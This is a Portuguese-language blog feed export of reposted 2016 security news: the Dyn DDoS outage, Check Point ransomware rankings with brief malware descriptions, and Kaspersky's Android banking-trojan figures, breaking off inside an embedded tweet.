Esta seria apenas mais uma falha no linux, que depressa seria mitigada. O problema é a sua idade e os sistemas onde está presente. Há já quem a esteja a explorar e por isso é urgente que todos os sistemas sejam atualizados com as correções já disponíveis.</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-89123186338499424982016-10-23T19:35:00.002-02:002016-10-23T19:35:56.668-02:00Ataque hacker derruba parte da internet nos EUA<div style="background-color: white; box-sizing: border-box; color: #282828; font-family: georgia; font-size: 18px; line-height: 29px; margin-bottom: 22px;">
Na manhã desta sexta-feira (21/10), moradores da costa leste dos<a href="http://epocanegocios.globo.com/palavrachave/estados-unidos/" style="background: transparent; box-sizing: border-box; color: #0bb1f4;"><strong style="box-sizing: border-box;">Estados Unidos</strong></a> enfrentaram dificuldades para acessar uma série de serviços na internet, incluindo sites populares, como <strong style="box-sizing: border-box;"><a href="http://epocanegocios.globo.com/palavrachave/twitter/" style="background: transparent; box-sizing: border-box; color: #0bb1f4;">Twitter</a>, Spotify, Reddit, Airbnb e Vox</strong>, entre outros. O problema teria sido causado por um ataque hacker contra o provedor de DNS Dyn.</div>
<div style="background-color: white; box-sizing: border-box; color: #282828; font-size: 18px; line-height: 29px; margin-bottom: 22px; text-align: justify;">
<strong style="box-sizing: border-box; color: #07b4f9; display: inline !important; font-size: 14px; height: 29px; padding-left: 12px; padding-top: 8px; text-transform: uppercase;"><span style="color: #282828; font-size: 18px;"><span style="font-family: Trebuchet MS, sans-serif;">“Nossa prioridade nas últimas duas horas foi restaurar a performance dos nossos clientes”, afirmou Scott Hilton, vice-presidente da Dyn, em comunicado.</span></span></strong></div>
<div style="background-color: white; box-sizing: border-box; color: #282828; font-size: 18px; line-height: 29px; margin-bottom: 22px; text-align: justify;">
<span style="font-family: georgia;">De acordo com a companhia, um ataque distribuído de negação de serviço (DDoS, na sigla em inglês) atingiu a infraestrutura de gerenciamento de endereços DNS por volta das 9h10, pelo horário de Brasília, e os serviço só foram restaurados às 11h20. O problema afetou principalmente a costa leste dos EUA, onde estão grandes metrópoles, como Nova York e a capital, Washington.</span></div>
<div style="background-color: white; box-sizing: border-box; color: #282828; font-size: 18px; line-height: 29px; margin-bottom: 22px; text-align: justify;">
<img alt="Resultado de imagem para usa" height="328" src="http://www.ijecindia.com/images/usa.png" width="640" /></div>
<div style="background-color: white; box-sizing: border-box; color: #282828; font-family: georgia; font-size: 18px; line-height: 29px; margin-bottom: 22px; text-align: justify;">
Com sede em Manchester, em New Hampshire, a Dyn oferece, entre outros serviços, o gerenciamento de DNS (acrônimo para Domain Name System), responsável por fazer a conexão entre o requerimento de acesso do internauta e os computadores onde as informações de um site estão armazenadas.</div>
<div style="background-color: white; box-sizing: border-box; color: #282828; font-family: georgia; font-size: 18px; line-height: 29px; margin-bottom: 22px; text-align: justify;">
Os ataques DDoS usam milhares de computadores e outros dispositivos infectados para enviarem requisições simultâneas a um único ponto na internet, fazendo com que ele seja sobrecarregado e saia do ar. No caso, os hackers miraram no gerenciamento de DNS e multiplicaram o escopo do ataque, já que o serviço serve de ponte para outros sites.</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-11820127743862801032016-10-23T19:31:00.000-02:002016-10-23T19:31:07.898-02:00Ransomware sobe ao terceiro lugar entre as ciberameaças mais comuns<h3 style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Infetar um computador, cifrar todos os dados e depois pedir um resgate para que o utilizador possa aceder à sua máquina e informação é um tipo de ataque cada vez mais comum. A Check Point já o coloca em 3º lugar a nível global, e é a 5ª ameaça com mais prevalência em Portugal.</span></h3>
<div>
<img alt="tek ataques informáticos" height="320" src="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=1000&H=500&crop=center&tv=2" width="640" /></div>
<div class="thumb" style="background: rgb(245, 245, 245); border-radius: 3px; border: 1px solid rgba(0, 0, 0, 0.137255); box-sizing: border-box; color: #555555; font-family: Roboto, Arial, Helvetica, sans-serif; font-size: 17.28px; height: 0px; line-height: 25.056px; margin: 0px 0px 1em; outline: 0px !important; overflow: hidden; padding: 1px; position: relative !important; text-align: center;">
<picture style="border-radius: 3px; box-sizing: border-box; height: 422.672px; left: 0px; position: absolute; top: 0px; width: 851.906px;"><source alt="tek ataques informáticos" media="(min-width:1261px)" srcset="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=1000&H=500&crop=center&tv=2, http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=2000&H=1000&crop=center&tv=2 2x" style="box-sizing: border-box;"></source><source alt="tek ataques informáticos" media="(min-width:961px)" srcset="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=825&H=410&crop=center&tv=2, http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=1650&H=820&crop=center&tv=2 2x" style="box-sizing: border-box;"></source><source alt="tek ataques informáticos" media="(min-width:768px)" srcset="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=540&H=270&crop=center&tv=2, http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=1080&H=540&crop=center&tv=2 2x" style="box-sizing: border-box;"></source><source alt="tek ataques informáticos" media="(min-width:601px)" srcset="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=700&H=350&crop=center&tv=2, http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=1400&H=700&crop=center&tv=2 2x" style="box-sizing: border-box;"></source><source alt="tek ataques informáticos" media="(min-width:415px)" srcset="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=540&H=270&crop=center&tv=2, http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=1080&H=540&crop=center&tv=2 2x" style="box-sizing: border-box;"></source><source alt="tek ataques informáticos" media="(min-width:321px)" srcset="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=360&H=180&crop=center&tv=2, http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=720&H=360&crop=center&tv=2 2x" style="box-sizing: border-box;"></source><source srcset="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=270&H=135&crop=center&tv=2, http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=540&H=270&crop=center&tv=2 2x" style="box-sizing: border-box;"></source><img alt="tek ataques informáticos" src="http://thumbs.sapo.pt/?pic=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&W=1000&H=500&crop=center&tv=2" style="backface-visibility: hidden; border-radius: 3px; border: 0px; box-sizing: border-box; display: block; height: auto; left: 0px; margin: 0px auto; max-width: 100%; position: absolute; text-align: justify; top: 0px; vertical-align: top; width: auto;" /><div style="background: rgb(222, 42, 40); border-radius: 0px 2px 2px 0px; border: 1px solid rgba(0, 0, 0, 0.0784314); box-sizing: border-box; color: whitesmoke; cursor: pointer; display: inline !important; font-size: 17.28px; height: 32px; line-height: 20px; padding: 0.25em 0.5em; text-align: justify; text-decoration: none; text-shadow: rgba(0, 0, 0, 0.4) 0px 0px 1px; vertical-align: middle; white-space: nowrap;">
<a class="ink-button pinterest" href="http://pinterest.com/pin/create/button/?url=http://tek.sapo.pt/noticias/internet/artigo/ransomware_sobe_ao_terceiro_lugar_entre_as_ciberameacas_mais_comuns-49306but.html&media=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&description=Ransomware%20sobe%20ao%20terceiro%20lugar%20entre%20as%20ciberamea%C3%A7as%20mais%20comuns" rel="nofollow" style="background: rgb(222, 42, 40); border-radius: 0px 2px 2px 0px; border: 1px solid rgba(0, 0, 0, 0.0784314); box-sizing: border-box; color: whitesmoke; cursor: pointer; display: inline !important; font-size: 17.28px; height: 32px; line-height: 20px; padding: 0.25em 0.5em; text-decoration: none; text-shadow: rgba(0, 0, 0, 0.4) 0px 0px 1px; vertical-align: middle; white-space: nowrap;" target="_blank"></a><a class="ink-button pinterest" href="http://pinterest.com/pin/create/button/?url=http://tek.sapo.pt/noticias/internet/artigo/ransomware_sobe_ao_terceiro_lugar_entre_as_ciberameacas_mais_comuns-49306but.html&media=http://mb.web.sapo.io/80eebf02b85e1f3b4b85b79d96a600197dd2d346.png&description=Ransomware%20sobe%20ao%20terceiro%20lugar%20entre%20as%20ciberamea%C3%A7as%20mais%20comuns" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 0px 2px 2px 0px; border: 1px solid rgba(0, 0, 0, 0.0784314); box-sizing: border-box; color: whitesmoke; cursor: pointer; display: inline !important; font-size: 17.28px; height: 32px; padding: 0.25em 0.5em; text-decoration: none; text-shadow: rgba(0, 0, 0, 0.4) 0px 0px 1px; vertical-align: middle;" target="_blank"><span style="background-color: #ededed; color: #555555; font-size: 1.1em; line-height: 25.056px;">Os dados da empresa de segurança relativos a setembro mostram que pela primeira vez o ransomware assume-se como uma das ciberameaças mais comuns. O Locky, um malware que cifra os dados e pede em troca da chave de acesso um pagamento em Bitcoins, foi responsável por 6% de todos os ciberataques identificados no último mês.</span></a></div>
</picture></div>
<div class="article_body" style="background-color: #ededed; box-sizing: border-box; color: #555555; font-family: Roboto, Arial, Helvetica, sans-serif; font-size: 17.28px; line-height: 25.056px; margin: 1em 0px;">
<div style="box-sizing: border-box; font-size: 1.1em; margin-bottom: 1.305em; text-align: justify;">
Recentemente a Polícia Judiciária juntou-se à iniciativa "no more ransomware" que integra 12 entidades, entre as quais a Europol, a Kaspersky Lab e a intel Security no combate a este tipo de ameaças que são cada vez mais frequentes e são seguidas de perto por todas as entidades relacionadas com cibersegurança.</div>
<div style="box-sizing: border-box; font-size: 1.1em; margin-bottom: 1.305em; text-align: justify;">
O Índice de Ameaças da Check Point mantém a avaliação do tipo de malware e ataques mais frequentes, e o <a href="https://www.threat-cloud.com/ThreatPortal/#/map" style="background: 0px 0px; box-sizing: border-box; color: #be4b19; cursor: pointer; text-decoration: none;">Mapa Mundial de Ciberameaças</a> segue em tempo real a evolução dos problemas de cibersegurança no mundo. Segundo a empresa, o ransomware teve um crescimento de 13% em setembro que fez com que chegasse ao top 3 a nível mundial, ficando em quinta posição nas ameaças mais frequentes em Portugal. </div>
<div style="box-sizing: border-box; font-size: 1.1em; margin-bottom: 1.305em; text-align: justify;">
Em termos gerais o número total de famílias ativas de malware continua a crescer, juntando-se agora ao Top 10 mundial o Chanitor, um programa que descarrega gateways de pagamento maliciosas, o exploit kit Blackhole e o Nivdort, um bot multiusos.</div>
<div style="box-sizing: border-box; font-size: 1.1em; margin-bottom: 1.305em; text-align: justify;">
Pelo sexto mês consecutivo, o HummingBad continua a ser a primeira opção dos hackers para atacar dispositivos móveis, um tipo de ameaça cada vez mais frequente face à disseminação destes equipamentos.</div>
<div style="box-sizing: border-box; font-size: 1.1em; margin-bottom: 1.305em; text-align: justify;">
<span style="box-sizing: border-box; font-size: 12px;">Nas empresas o malware que causa mais estragos é o Conficker, que esteve na origem de 14% de todos os ataques conhecidos.</span></div>
<div style="box-sizing: border-box; font-size: 1.1em; margin-bottom: 1.305em; text-align: justify;">
De notar ainda que no total, o Top 10 das variantes mais populares foi responsável por 50% de todos os ataques.</div>
<div style="box-sizing: border-box; font-size: 1.1em; margin-bottom: 1.305em; text-align: justify;">
<span style="box-sizing: border-box; font-size: 12px;">A Check Point deixa para os mais curiosos um "guia" do Top 5 das maiores ameaças em Portugal, a maioria das quais já é bem conhecida.</span></div>
<ol style="box-sizing: border-box; line-height: 1.4; list-style: none; margin: 0px; padding: 0px;">
<li style="box-sizing: border-box; list-style: none; margin: 0px; text-align: justify;">Conficker – Worm que permite operações remotas, descargas de malware e roubo de credenciais. Este malware desativa os serviços de segurança do sistema do Microsoft Windows. As máquinas infetadas são controladas por uma botnet, que contacta o servidor de Comando e Controlo para receber instruções.</li>
<li style="box-sizing: border-box; list-style: none; margin: 0px; text-align: justify;">Zeus - Um Trojan para Windows amplamente distribuído, que é usado principalmente para roubar informações bancárias. Quando uma máquina é comprometida, o malware envia informações, como credenciais de conta, para os atacantes usando uma cadeia de servidores C & C. O Trojan também é usado para distribuir ransomware. Atualmente, muitos cibercriminosos usam variantes personalizadas do Zeus, tipicamente distribuídas através de phishing e drive-by downloads.</li>
<li style="box-sizing: border-box; list-style: none; margin: 0px; text-align: justify;">Nivdort – Trojan que ataca o Windows. Para tal, armazena passwords, informação do sistema, a versão do Windows, o endereço IP, a configuração do software ou a localização aproximada do equipamento. Algumas versões deste malware detetam as teclas premidas no teclado e modificam as configurações DNS.</li>
<li style="box-sizing: border-box; list-style: none; margin: 0px; text-align: justify;">Tinba - Trojan que ataca clientes de bancos europeus. Rouba as credenciais da vítima quando esta as tenta introduzir no website de um dos bancos infetados, através de uma página falsa que pede ao utilizador a sua informação pessoal. Também é conhecido por Tiny Banker ou Zusy, já que quando foi descoberto em 2012 era o Trojan bancário mais pequeno do mundo.</li>
<li style="box-sizing: border-box; list-style: none; margin: 0px; text-align: justify;">Locky – Ransomware Trojan que ataca sobretudo a plataforma Windows. Este malware envia informação do sistema para um servidor remoto e recebe uma chave de encriptação para encriptar os ficheiros existentes no sistema infetado. O malware exige que o pagamento pela liberação desses ficheiros seja feito na forma de Bitcoins. Para se manter no sistema mesmo depois de um <em style="box-sizing: border-box;">reboot</em>, o malware adiciona uma chave de execução do registo do sistema.</li>
</ol>
<div style="box-sizing: border-box; font-size: 1.1em; margin-bottom: 1.305em; text-align: justify;">
<br /></div>
</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-31157316385233020722016-10-23T19:26:00.003-02:002016-10-23T19:26:49.757-02:00Kaspersky detecta mais de 77 mil trojans bancários em dispositivos móveis<div class="olhoNoticia" style="background-color: white; border-color: rgb(123, 123, 123); border-style: solid; border-width: 1px 0px; clear: both; color: #7b7b7b; font-family: Calibri, Arial, sans-serif; font-size: 21px; line-height: 21px; list-style: none; margin: 0px 0px 20px; outline: none; padding: 13px 0px; text-align: justify;">
Segundo pesquisa da empresa de cibersegurança, 98% deste tipo de malware é projetado para aparelhos Android</div>
<div class="corpoNoticia" style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; list-style: none; margin: 0px; outline: none; overflow: hidden; padding: 0px; width: 620px;">
<figure class="ilustraCorpoNoticia" style="border: 0px; clear: both; list-style: none; margin: 0px auto 20px; outline: none; padding: 0px; width: 520px;"><img alt="" src="http://idgnow.com.br/idgimages/Smartphone-user-close.jpg" style="border: 0px; clear: both; display: block; height: 390px; list-style: none; margin: 0px 0px 7px; outline: none; padding: 0px; text-align: justify; vertical-align: middle; width: 520px;" /></figure><div class="boxesLeft" style="border: 0px; float: left; list-style: none; margin: 0px 20px 0px 0px; max-width: 165px; min-width: 162px; outline: none; padding: 0px;">
</div>
<div style="border: 0px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px; text-align: justify;">
A Kaspersky Lab detectou mais de 77 mil trojans bancários nos dispositivos móveis no Brasil. Segundo pesquisa recente da empresa de cibersegurança, 98% deste tipo de malware é projetado para o sistema operacional Android, usada por mais de 90% dos brasileiros que possuem smartphones.</div>
<div style="border: 0px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px; text-align: justify;">
O trojan bancário é um dos mais perigosos tipos de malware, uma vez que seu principal objetivo é roubar dinheiro das contas de suas vítimas sem que elas percebam. </div>
<div style="border: 0px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px; text-align: justify;">
Quem usa aplicativos bancários e realiza compras pelo celular, estão ainda mais vulneráveis a este tipo de vírus, alerta a companhia. </div>
<div style="border: 0px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px; text-align: justify;">
A ação é imperceptível, uma vez que a interface do Trojan se parece com a do próprio banco, mas é executada em seu lugar, sendo ativado no momento em que a vítima digita suas credenciais, roubando suas informações.</div>
<div style="border: 0px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px; text-align: justify;">
Para enganar os usuários, os criminosos publicam aplicativos maliciosos em lojas de terceiros, enviam mensagens de texto com URLs de phishing e, às vezes, escondem de forma sútil seus aplicativos em lojas oficiais como a Google Play Store. </div>
<div style="border: 0px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px; text-align: justify;">
Os usuários de iPhone também precisam tomar cuidado. Aqueles que já realizaram um jailbreak em seu telefone estão mais vulneráveis, já que com isso o dispositivo perde a proteção inicial.</div>
<div style="border: 0px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px; text-align: justify;">
"Infelizmente, os usuários são os principais responsáveis pelas infecções em seus aparelhos, já que não têm conhecimento sobre este tipo de ameaça e realizam o download do malware em seus computadores por acreditarem que eles estão instalando aplicativos legítimos", disse Roberto Martinez, analista de segurança da Kaspersky Lab na América Latina. "A melhor forma de proteção contra trojans bancários é instalar uma solução de segurança para todos os dispositivos com acesso à internet e tomar cuidado ao fazer download de aplicativos", acrescentou.</div>
</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-80278933407300617412016-10-23T18:48:00.002-02:002016-10-23T18:48:59.247-02:00Quebrando a internet: estamos sofrendo o maior ataque DDoS da história<img height="171" src="https://imgnzn-a.akamaized.net///2016/10/21/21124014589519-t1200x480.jpg" width="400" /><div>
<br /></div>
<div>
<div class="article-text highlight p402_premium" itemprop="articleBody" style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 16px; line-height: 26px; margin-top: -26px; position: relative;">
<div style="box-sizing: border-box; margin-top: 26px;">
Um grande ataque de negação de serviço, <a href="http://www.tecmundo.com.br/ddos" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank">DDoS</a>, aos servidores do Dyn está causando problemas em diversos sites e plataformas utilizados por milhões de usuários, que estão sentindo instabilidade na navegação e uso. Entre os serviços afetados, estão o Twitter, o Spotify, o Reddit, a PlayStation Network, o Imgur e muitos outros.</div>
<div style="box-sizing: border-box; margin-top: 26px;">
A Dyn é uma das maiores companhias que compreende <a href="http://www.tecmundo.com.br/site" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank">servidores de sites</a>, por isso, o ataque DDoS ainda não foi quantificado, mas deve ter sido gigantesco — recentemente, <a href="http://www.tecmundo.com.br/internet/110078-hackers-realizam-maior-ataque-ddos-historia.htm" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank">noticiamos um ataque de negação de serviço</a> que ultrapassou 1 TB por segundo. O DDoS teve início na manhã dessa sexta-feira (21) e, de acordo com a Dyn, todos os serviços já foram restaurados. Ainda não é seguro afirmar isso, mas podemos estar passando pelo maior ataque DDoS da história.</div>
<div id="anchor_wbf6557a05a" style="background: transparent; box-sizing: border-box; height: 1px; margin: 0px; padding: 0px; width: 1px;">
</div>
<div id="container_wbf6557a05a" style="box-sizing: border-box; left: -9999px; margin: 0px; overflow: hidden; padding: 0px; position: fixed;">
<div style="box-sizing: border-box; color: #666666; font-size: 11px; margin-bottom: 5px; margin-top: 26px; text-align: center;">
Publicidade</div>
<iframe frameborder="0" height="387" id="frame_wbf6557a05a" marginheight="0" marginwidth="0" name="wbf6557a05a" scrolling="no" style="border-style: initial; border-width: 0px; box-sizing: border-box; display: block; height: 387px; margin: 0px auto; max-width: 100%; width: 688px;" width="688"></iframe></div>
<div class="uk-text-right" style="box-sizing: border-box; margin-top: 26px; text-align: right;">
<span class="nzn-article-eye" style="box-sizing: border-box; clear: right; color: #0099ff; display: block; float: right; font-size: 28px; font-style: italic; line-height: 38px; margin-bottom: 34px; margin-left: 52px; margin-top: 0px; text-align: center; width: 324px;">O Brasil também está sentindo os efeitos</span></div>
<div style="box-sizing: border-box; margin-top: 26px;">
Usuário de internet nos Estados Unidos e na Europa foram os mais afetados, porém, também foram sentidos reflexo na América do Sul, com Brasil, Uruguai e Argentina; e na Índia e Austrália. O Twitter, por exemplo, está com a conexão "pipocando" no Brasil. Já a PlayStation Network está fora do ar.</div>
<div style="box-sizing: border-box; margin-top: 26px;">
<a href="https://www.dynstatus.com/incidents/nlr4yrr162t8" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank">No site oficial da Dyn</a>, há o seguinte comunicado: "Desde às 9:00 começamos a monitorar e mitigar um ataque DDoS contra nossa infraestrutura Dyn Managed DNS. Alguns consumidores podem sentir um aumento na latência DNS e propagação de delay durante este tempo. Atualizações serão postadas assim que disponíveis".</div>
<div style="box-sizing: border-box; margin-top: 26px;">
Veja um mapa dos ataques:</div>
<div style="box-sizing: border-box; margin-top: 26px;">
<span class="img-fc" style="box-sizing: border-box; clear: both; display: block; margin-bottom: 52px; margin-top: 52px; text-align: center;"><img src="http://img1.ibxk.com.br/2016/10/21/21123801464518.png?w=700" style="border: 0px; box-sizing: border-box; display: block; height: auto; margin-left: auto !important; margin-right: auto !important; max-width: 100%; vertical-align: middle;" /><span class="desc" style="box-sizing: border-box; display: block; font-style: italic; margin-top: 26px;">Ataques DDoS</span></span></div>
<div style="box-sizing: border-box; margin-top: 26px;">
Ainda não se sabe o tamanho do ataque de DDoS. Assim que mais informações sobre ele forem divulgadas, atualizaremos essa notícia. Para saber mais detalhes sobre ataques hacker, <a href="http://www.tecmundo.com.br/ataque-hacker" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank">acompanhe esta página</a>.</div>
<h2 style="box-sizing: border-box; color: black; font-size: 28px; line-height: 52px; margin: 52px 0px 0px;">
WikiLeaks</h2>
<div style="box-sizing: border-box; margin-top: 26px;">
O WikiLeaks acabou de postar uma mensagem no Twitter para possíveis parceiros encerrarem os ataques. A mensagem da plataforma de delação dá a entender que o DDoS massivo foi por causa de um suposto "assassinato" de Julian Assange, <a href="http://www.tecmundo.com.br/wikileaks/110624-wikileaks-assange-teve-acesso-internet-bloqueado-partido-estado.htm?utm_source=tecmundo.com.br&utm_medium=internas&utm_campaign=ultimasnoticias" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank">líder do WikiLeaks que está incomunicável</a> na embaixado equatoriana, em Londres. </div>
<div align="center" style="box-sizing: border-box;">
<twitterwidget class="twitter-tweet twitter-tweet-rendered" data-tweet-id="789574436219449345" id="twitter-widget-0" style="box-sizing: border-box; display: block; margin-bottom: 10px; margin-top: 10px; max-width: 100%; min-width: 220px; position: static; transform: rotate(0deg); visibility: visible; width: 500px;"><div class="SandboxRoot env-bp-350" data-twitter-event-id="0" style="background: 0px 0px; color: #1c2022; direction: ltr; font-family: Helvetica, Roboto, 'Segoe UI', Calibri, sans-serif; font-stretch: normal; line-height: 1.4; position: relative; text-align: left; white-space: initial;">
<div class="EmbeddedTweet EmbeddedTweet--mediaForward media-forward js-clickToOpenTarget js-tweetIdInfo" data-click-to-open-target="https://twitter.com/wikileaks/status/789574436219449345" data-dt-abbr="%{number}%{symbol}" data-dt-am="AM" data-dt-full="%{hours24}: %{minutes} - %{day} %{month} %{year} " data-dt-h="h" data-dt-hour="hora" data-dt-hours="horas" data-dt-long="%{day} %{month} %{year}" data-dt-m="m" data-dt-minute="minuto" data-dt-minutes="minutos" data-dt-months="jan|fev|mar|abr|maio|jun|jul|ago|set|out|nov|dez" data-dt-now="agora" data-dt-pm="PM" data-dt-s="s" data-dt-second="segundo" data-dt-seconds="segundos" data-dt-short="%{day} %{month}" data-iframe-title="Tweet do Twitter" data-scribe="page:tweet" data-tweet-id="789574436219449345" data-twitter-event-id="4" id="twitter-widget-0" lang="pt" style="border-radius: 4px; border: 0px; cursor: pointer; max-width: 520px; overflow: hidden;">
<article class="MediaCard
MediaCard--mediaForward
customisable-border" data-scribe="component:card" dir="ltr"><div class="MediaCard-media" style="background-color: #f5f8fa; overflow: hidden; position: relative; width: 500px;">
<a class="MediaCard-borderOverlay" href="https://twitter.com/wikileaks/status/789574436219449345/photo/1" role="presentation" style="background-color: transparent; border-radius: 4px 4px 0px 0px; border: 1px solid rgba(225, 232, 237, 0.74902); box-sizing: border-box; color: #2b7bb9; height: 261.656px; left: 0px; outline: 0px; position: absolute; text-decoration: none; top: 0px; width: 500px; z-index: 10;" tabindex="-1" title="Ver imagem no Twitter"><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">Ver imagem no Twitter</span></a><div class="MediaCard-widthConstraint js-cspForcedStyle" data-style="max-width: 1200px" style="margin: 0px auto; max-width: 1200px;">
<div class="MediaCard-mediaContainer js-cspForcedStyle" data-style="padding-bottom: 52.3333%" style="padding-bottom: 261.656px; position: relative;">
<a class="MediaCard-mediaAsset
NaturalImage
" data-scribe="element:photo" href="https://twitter.com/wikileaks/status/789574436219449345/photo/1" style="background-color: white; color: #2b7bb9; display: block; height: 261.656px; left: 0px; line-height: 0; outline: 0px; position: absolute; text-decoration: none; top: 0px; transition: opacity 0.5s; width: 500px;"><img alt="Ver imagem no Twitter" class="NaturalImage-image" data-srcset="https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FCvUhhlrXYAUldLh.jpg%3Alarge 1501w,https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FCvUhhlrXYAUldLh.jpg 1200w,https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FCvUhhlrXYAUldLh.jpg%3Asmall 680w" height="628" src="https://pbs.twimg.com/media/CvUhhlrXYAUldLh.jpg:small" style="border: 0px; height: auto; line-height: 0; max-height: 100%; max-width: 100%;" title="Ver imagem no Twitter" width="1200" /></a></div>
</div>
</div>
</article><div class="EmbeddedTweet-tweet" style="border-color: rgb(225, 232, 237); border-radius: 0px 0px 4px 4px; border-style: solid; border-width: 0px 1px 1px; padding: 14.4px 20px 11.6px;">
<blockquote cite="https://twitter.com/wikileaks/status/789574436219449345" class="Tweet h-entry js-tweetIdInfo subject expanded
is-deciderHtmlWhitespace" data-scribe="section:subject" data-tweet-id="789574436219449345" style="border: none; list-style: none; margin: 0px; padding: 0px;">
<div class="Tweet-header u-cf" style="padding-left: 45px; position: relative; white-space: nowrap;">
<div class="Tweet-brand u-floatRight" style="float: right !important; position: relative; z-index: 1;">
<span class="u-hiddenInNarrowEnv"><a class="FollowButton follow-button profile" data-scribe="component:followbutton" href="https://twitter.com/wikileaks" role="button" style="border-radius: 4px; border: 1px solid rgb(85, 172, 238); color: #55acee; display: inline-block; font-size: 14px; font-weight: 700; line-height: 1; outline: 0px; padding: 5.5px 13px 6.5px 11.5px; text-decoration: none;" title="Siga WikiLeaks no Twitter"><span class="FollowButton-bird" style="display: inline-block; position: relative; top: 1px;"><div aria-label="" class="Icon Icon--twitter " role="presentation" style="background-image: 